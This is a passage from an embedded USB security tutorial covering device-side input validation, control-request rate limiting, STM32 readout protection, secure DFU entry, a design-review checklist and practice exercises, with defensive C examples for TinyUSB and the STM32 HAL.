As of 2026, USB Type-C Authentication is not yet widely deployed in most custom embedded devices. The primary barrier is the requirement for a certificate issued by the USB-IF CA, which requires USB-IF membership and certification fees. The protocol is, however, well-supported in chipset silicon from Cypress (EZ-PD), Renesas (uPD350), and others that include the protocol in hardware. For most embedded device developers, the practical focus should be on DFU signing (Section 5) as the primary DFU security mechanism, with USB Authentication as a future-proofing consideration for products that require cable or charger authentication.

Host-Side Input Validation

When we think of USB security, we naturally think of the device attacking the host. But the reverse is equally important: your USB device receives data from a host that may be hostile. In an industrial environment, a device may be plugged into a compromised workstation. In a security-critical product (USB security key, encrypted storage, industrial controller), the device must treat all host-provided data as potentially malicious.

Common Device-Side Vulnerabilities

  • Buffer overflow via oversized BULK OUT writes: The MSC (Mass Storage Class) write callback receives a sector buffer from the host. If your callback copies host-provided data without validating the transfer length against the destination buffer size, an oversized write creates a stack or heap overflow on the device.
  • Command injection via CDC control requests: If your CDC device acts on CDC class-specific control requests (SET_LINE_CODING, SET_CONTROL_LINE_STATE) to configure hardware, and those requests are not validated, a malicious host can configure peripheral hardware into undefined states.
  • Integer overflow in custom class drivers: A wLength field in a custom control request of 0xFFFF, processed without validation, can cause integer overflow in buffer size calculations — a common source of heap overflow vulnerabilities.
  • Denial of service via rapid control request flooding: The USB host can send control requests (SETUP packets) at a very high rate. Without rate limiting, a hostile host can monopolize the device's CPU in control request processing, starving all other real-time tasks.
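The integer overflow case in particular deserves a concrete check: validate host-supplied lengths against the destination budget before any arithmetic that could wrap. A minimal sketch (the buffer size and the notion of a per-request header length are illustrative):

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define CTRL_BUF_SIZE 256U   /* Illustrative control transfer buffer */

/* Validate a host-supplied wLength plus a per-request header size
 * without risking wraparound: compare against the budget by
 * subtraction, never by adding two untrusted values together. */
static bool ctrl_request_len_ok(uint16_t wLength, uint32_t header_len)
{
    if (header_len > CTRL_BUF_SIZE) {
        return false;                       /* header alone too big */
    }
    /* Safe: header_len <= CTRL_BUF_SIZE, so this cannot underflow */
    return (uint32_t)wLength <= (CTRL_BUF_SIZE - header_len);
}
```

A naive `header_len + wLength <= CTRL_BUF_SIZE` check is the pattern that overflows when wLength is 0xFFFF on a 16-bit accumulator; the subtraction form cannot.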

Safe Input Validation Pattern

/* ---------------------------------------------------------------
 * Safe MSC write callback — validates all inputs before copying
 * Called by TinyUSB MSC class driver for every SCSI WRITE command
 * lba:       Logical Block Address (sector number)
 * offset:    Byte offset within the transfer (for multi-packet writes)
 * buffer:    Host-provided data buffer
 * bufsize:   Number of bytes in this callback invocation
 * ---------------------------------------------------------------*/

#define SECTOR_SIZE         512U
#define STORAGE_SECTOR_COUNT 16384U  /* 8 MB flash storage */

/* Our static sector buffer — must NEVER be overwritten outside bounds */
static uint8_t g_write_sector_buf[SECTOR_SIZE];

int32_t tud_msc_write10_cb(uint8_t lun, uint32_t lba,
                            uint32_t offset, uint8_t *buffer,
                            uint32_t bufsize)
{
    (void)lun;

    /* --- Validation 1: LBA within storage range --- */
    if (lba >= STORAGE_SECTOR_COUNT) {
        TU_LOG1("MSC write: LBA %lu out of range (max %lu)\r\n",
                (unsigned long)lba,
                (unsigned long)(STORAGE_SECTOR_COUNT - 1));
        return -1;  /* Causes TinyUSB to return SCSI CHECK CONDITION */
    }

    /* --- Validation 2: offset within sector bounds --- */
    if (offset >= SECTOR_SIZE) {
        TU_LOG1("MSC write: offset %lu >= SECTOR_SIZE\r\n",
                (unsigned long)offset);
        return -1;
    }

    /* --- Validation 3: bufsize does not exceed remaining sector space --- */
    uint32_t remaining = SECTOR_SIZE - offset;
    if (bufsize > remaining) {
        TU_LOG1("MSC write: bufsize %lu exceeds remaining %lu bytes\r\n",
                (unsigned long)bufsize, (unsigned long)remaining);
        return -1;
    }

    /* --- Validation 4: buffer pointer is not NULL --- */
    if (buffer == NULL) {
        return -1;
    }

    /* All validations passed — safe to copy */
    memcpy(g_write_sector_buf + offset, buffer, bufsize);

    /* If this is the last packet for this sector, flush to storage */
    if (offset + bufsize == SECTOR_SIZE) {
        flash_write_sector(lba, g_write_sector_buf);
    }

    return (int32_t)bufsize;
}

/* ---------------------------------------------------------------
 * Rate-limited control request handler
 * Prevents DoS via control request flooding
 * ---------------------------------------------------------------*/
static uint32_t g_last_ctrl_req_tick = 0;
#define CTRL_REQ_MIN_INTERVAL_MS  5U   /* Max 200 control requests/second */

bool tud_vendor_control_xfer_cb(uint8_t rhport, uint8_t stage,
                                 tusb_control_request_t const *req)
{
    (void)rhport;

    /* TinyUSB invokes this callback once per control transfer stage
     * (SETUP, DATA, ACK). Validate and rate-limit only at the SETUP
     * stage; later stages of an already-accepted request pass through. */
    if (stage != CONTROL_STAGE_SETUP) return true;

    uint32_t now = get_system_tick_ms();

    /* Rate limiting: reject if requests arrive faster than the interval.
     * Unsigned subtraction handles tick-counter wraparound correctly. */
    if ((now - g_last_ctrl_req_tick) < CTRL_REQ_MIN_INTERVAL_MS) {
        TU_LOG1("Control request rate limit exceeded — STALL\r\n");
        return false;  /* Returning false stalls the control endpoint */
    }
    g_last_ctrl_req_tick = now;

    /* Validate wLength before accepting the data phase */
    if (req->wLength > MAX_VENDOR_CTRL_PAYLOAD) {
        TU_LOG1("Control request wLength %u exceeds max %u — STALL\r\n",
                req->wLength, MAX_VENDOR_CTRL_PAYLOAD);
        return false;  /* STALL */
    }

    /* ... process valid request ... */
    return true;
}

Watchdog Recovery

If an attacker manages to get the device firmware into an unexpected state through malformed protocol messages, a hardware watchdog timer is the last line of defense. Configure the watchdog with a timeout appropriate to your application (typically 100–500 ms for a USB device that handles requests continuously). The main loop or USB task scheduler must kick the watchdog regularly. Any state that hangs the device — including a deliberately induced deadlock via protocol manipulation — will trigger a clean reset, restoring device functionality.

Secure Boot + USB Combined

Secure DFU firmware signing is only half of the story. Even with signed DFU, an attacker with physical access to the device and JTAG/SWD debug port access can bypass the bootloader entirely — reading out flash contents, writing arbitrary firmware at the hardware level, or extracting cryptographic keys from RAM. Readout Protection (RDP) on STM32 microcontrollers is the hardware mechanism that prevents this.

STM32 RDP Levels

| RDP Level | JTAG/SWD Debug | Flash Read via Debug | SRAM Access | System Bootloader | DFU Upgrade Path |
|---|---|---|---|---|---|
| Level 0 (default) | Fully enabled | Yes — full flash access | Full read/write | Fully functional | Any direction (0→1→2) |
| Level 1 | Disabled during user code execution | No — blocked by hardware | Limited: only during debug halt | Blocked (cannot read flash via DFU) | 1→0 causes mass erase; 1→2 allowed |
| Level 2 (permanent) | Permanently disabled — irreversible | No — hardware enforced | No debug access | Blocked completely | Cannot downgrade — permanent |

For production hardware, RDP Level 2 is the correct choice. It permanently disables all debug interfaces and prevents any flash readout or hardware-level firmware modification. The trade-off is that it is irreversible: if the bootloader or production firmware contains a critical bug, there is no recovery path via debug. This means the secure DFU mechanism must be thoroughly tested before RDP Level 2 is set.

Setting RDP Level 2 via Option Bytes

/* ---------------------------------------------------------------
 * Set STM32 RDP Level 2 — IRREVERSIBLE — production use only
 * Call this function ONCE during manufacturing finalization
 * after all firmware has been loaded and verified
 * ---------------------------------------------------------------*/
void set_rdp_level2_permanent(void)
{
    FLASH_OBProgramInitTypeDef ob_init = {0};

    /* First: read current option bytes state */
    HAL_FLASHEx_OBGetConfig(&ob_init);

    /* Check if already at Level 2 */
    if (ob_init.RDPLevel == OB_RDP_LEVEL_2) {
        /* Already set — nothing to do */
        return;
    }

    /* Unlock option bytes */
    HAL_FLASH_Unlock();
    HAL_FLASH_OB_Unlock();

    /* Set RDP Level 2 */
    ob_init.OptionType = OPTIONBYTE_RDP;
    ob_init.RDPLevel   = OB_RDP_LEVEL_2;  /* 0xCC in the option byte */

    if (HAL_FLASHEx_OBProgram(&ob_init) != HAL_OK) {
        /* Programming failed — re-lock and bail out without launching */
        HAL_FLASH_OB_Lock();
        HAL_FLASH_Lock();
        return;
    }

    /* Launch option byte loading — causes system reset */
    HAL_FLASH_OB_Launch();

    /* Should not reach here — HAL_FLASH_OB_Launch() resets the MCU */
    while (1) {}
}

Custom DFU Entry Point Without BOOT0

The STM32 system bootloader (activated by pulling BOOT0 high at reset) is blocked at RDP Level 1 and above, as intended. But your custom DFU bootloader — stored in your own user flash — is still operational. The key is to enter the bootloader only through a controlled software trigger, not through the BOOT0 pin exposed externally on the PCB. Recommended patterns:

  • Magic word in RAM: Set a magic value (e.g., 0xDEADC0DE) in a RAM location that persists across a software reset (in the .noinit section, outside the zero-initialized region). The bootloader checks this word on every startup. If it matches, enter DFU mode; if not, boot the application.
  • Button hold at power-on: Check a dedicated "DFU entry" button at boot. If held, enter DFU mode. Never expose BOOT0 externally in production hardware.
  • Remote DFU trigger via authenticated command: A special vendor control request (protected by a challenge-response HMAC) tells the application firmware to write the magic word and trigger a software reset into the bootloader.

USB Security Checklist

Use this checklist during design review and pre-production sign-off to ensure all USB security considerations have been addressed. Each item should be assigned an owner and a target implementation date.

| Security Item | Risk Level | Implementation | Verification Method |
|---|---|---|---|
| VBUS Hardware Protection | Critical | TVS diode (D+/D-) + polyfuse (VBUS) + protection IC (TI TPD4S012) | ESD gun test, USB Killer test on prototype hardware |
| Descriptor Length Validation | Critical | Bounds-checked descriptor parser, watchdog on assertion failure | Fuzzing with usbfuzz tool, code review of parser |
| Signed DFU Firmware | Critical | ECDSA P-256 signature verification before flash write, STALL on failure | Attempt upload of unsigned binary — must be rejected |
| RDP Level 2 in Production | Critical | Set during manufacturing finalization step via option bytes | Attempt JTAG/SWD connection — must fail |
| USB Device Whitelist Policy | High | Document VID/PID in product security guide for enterprise IT | Confirm device passes USBGuard policy on customer reference platform |
| No BOOT0 External in Production | High | BOOT0 pin tied to GND via 10 kΩ, no external access point | PCB review — verify no test point or header on BOOT0 |
| Host Input Validation | High | All BULK/INTERRUPT/CONTROL payloads validated for length before use | Fuzzing with Wireshark + modified host driver sending oversized payloads |
| Firmware Version Rollback Protection | High | Monotonic version counter in OTP flash, reject downgrade in bootloader | Attempt to flash older signed firmware — must be rejected |
| AES Firmware Encryption (if applicable) | Medium | AES-128-CBC with key in OTP or ATECC608A secure element | Capture DFU upload traffic — confirm ciphertext (no plaintext constants) |
| Watchdog Timer Active | Medium | IWDG configured with 200 ms timeout, kicked in USB task loop | Halt USB task in debugger — device should reset within timeout |
| Audit Logging (optional) | Low | Log DFU attempts, failed signature checks, and rate-limit triggers to EEPROM | Review log after intentional failed DFU attempt |

Practical Exercises

These exercises apply the USB security concepts from this article to real firmware and hardware. Each exercise is designed to produce a verifiable, testable result — not just conceptual understanding.

Exercise 1 Beginner

Implement a USB Security Audit Using the Tool Below

Take a USB device project you have worked on (from any earlier part of this series) and fill out the USB Security Audit form below. For each security item, honestly assess whether your current firmware and hardware design meets the requirement. Pay particular attention to DFU signing status, VBUS protection, and RDP level. The completed document becomes your security requirements backlog — assign completion dates and owners for each unaddressed item.

Exercise 2 Intermediate

Add Bounds Checking to a TinyUSB Descriptor Parser

Take a TinyUSB project (CDC or HID from Parts 6 or 7) and write a unit test that calls the configuration descriptor parser directly with intentionally malformed inputs: (a) a wTotalLength value of 0xFFFF with only 64 bytes of actual descriptor data, (b) a bNumInterfaces value of 10 in a configuration with only 1 interface, (c) an interface descriptor with bLength set to 1. Verify that your parser handles each case without a buffer overflow — add bounds checking where it is missing. Run the test with AddressSanitizer enabled (-fsanitize=address) if compiling on a Linux host for maximum coverage of boundary violations.

Exercise 3 Advanced

Implement a Complete Signed DFU Bootloader

Implement a complete secure DFU bootloader for an STM32F4 or RP2040 target. Requirements: (a) the bootloader occupies the first 32 KB of flash (0x08000000–0x08007FFF on STM32), (b) the application starts at 0x08008000, (c) the bootloader enters DFU mode if the magic word 0xDEADC0DE is present in the first word of SRAM at reset, or if a button is held, (d) DFU upload is received into a staging area in the second half of flash, (e) after download completes the bootloader verifies the ECDSA P-256 signature using the micro-ecc library, (f) on success the application region is erased and the new firmware is written, (g) on failure a DFU_STATUS_ERR_VENDOR is returned and no flash write occurs. Test by signing a minimal LED blink firmware and uploading it via dfu-util.


USB Security Audit Generator

Use this tool to document your USB device's security posture — project details, MCU, RDP level, DFU signing status, VBUS protection, and host input validation. Download as Word, Excel, PDF, or PowerPoint for security review or compliance documentation.

All data stays in your browser — nothing is sent to any server.

Conclusion & Next Steps

USB security is not an afterthought — it is a design discipline that must be considered from the first schematic revision and the first line of bootloader code. In this article we covered the complete USB security landscape for embedded device developers:

  • The USB attack surface is bidirectional: devices can attack hosts (BadUSB/HID injection) and hosts can attack devices (descriptor fuzzing, malicious DFU). Both directions require deliberate defensive design.
  • USB Killer is a hardware-level attack with no software mitigation. TVS diodes, polyfuses, and dedicated protection ICs like the TI TPD4S012 are mandatory for production hardware exposed to untrusted USB ports.
  • Descriptor fuzzing defense requires bounds checking in every descriptor parser path, tested with tools like usbfuzz before production release.
  • Secure DFU with ECDSA P-256 firmware signing is the single most important security feature for any USB device that supports firmware updates. An unsigned DFU port is an attacker's dream: a USB-accessible backdoor to full firmware control.
  • Firmware encryption with AES-128-CBC, combined with signing (encrypt-then-sign), protects firmware confidentiality as well as integrity. Keys must be stored in OTP, secure elements, or TrustZone-protected memory.
  • RDP Level 2 on STM32 (or equivalent on other MCUs) permanently disables debug access and is the required final step in production manufacturing for any security-sensitive device.
  • Host input validation treats all host-provided data as potentially malicious: validate all lengths, reject unknown command codes, implement rate limiting, and maintain a watchdog for recovery from protocol attacks.

Next in the Series — The Final Part

In Part 17: USB Hardware Design — the final part of this series — we move from firmware to the physical world and design production-quality USB hardware from the ground up. We will cover connector selection and USB-C orientation detection, impedance-controlled differential pair routing for both FS and HS USB, crystal and HSI48 clock selection, ESD and overvoltage protection circuits, USB hub design with the SMSC USB2514B, USB-C Power Delivery hardware, PCB stackup for EMC compliance, and a complete production hardware design checklist. This is the article that brings together everything in the series into a complete, shippable USB product.
